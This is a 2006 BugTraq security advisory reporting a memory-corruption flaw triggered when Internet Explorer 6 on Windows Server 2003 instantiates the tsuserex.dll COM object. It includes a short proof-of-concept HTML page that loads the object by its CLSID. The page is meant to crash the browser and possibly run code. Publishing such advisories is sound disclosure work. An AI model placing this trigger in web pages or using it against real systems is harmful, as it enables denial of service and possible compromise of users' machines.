BugTraq
[XSec-06-06]: Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability Aug 17 2006 05:36PM
nop (nop xsec org)
Advisory ID:
XSec-06-06

Advisory Name:
Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability

Release Date:
08/18/2006

Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN

Affected version:
Windows Server 2003 + Internet Explorer 6.0

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
A vulnerability has been found in Internet Explorer 6.0 on Microsoft Windows 2003. When Internet Explorer tries to instantiate the tsuserex.dll (Terminal Services) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.

Exploit:
=============== tsuserex.dll.htm start ================

<!--
// Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation
Vulnerability
// tested on Windows 2003 EE SP1 CN

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}
// Info: ADsTSUserEx Class
// ProgID: tsuserex.ADsTSUserEx.1
// InprocServer32: C:\WINDOWS\system32\tsuserex.dll

--!>

<html><body>
<object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object>
</body>
</html>

=============== tsuserex.dll.htm end ==================

Link:
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=14

About XSec:
We are redhat.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus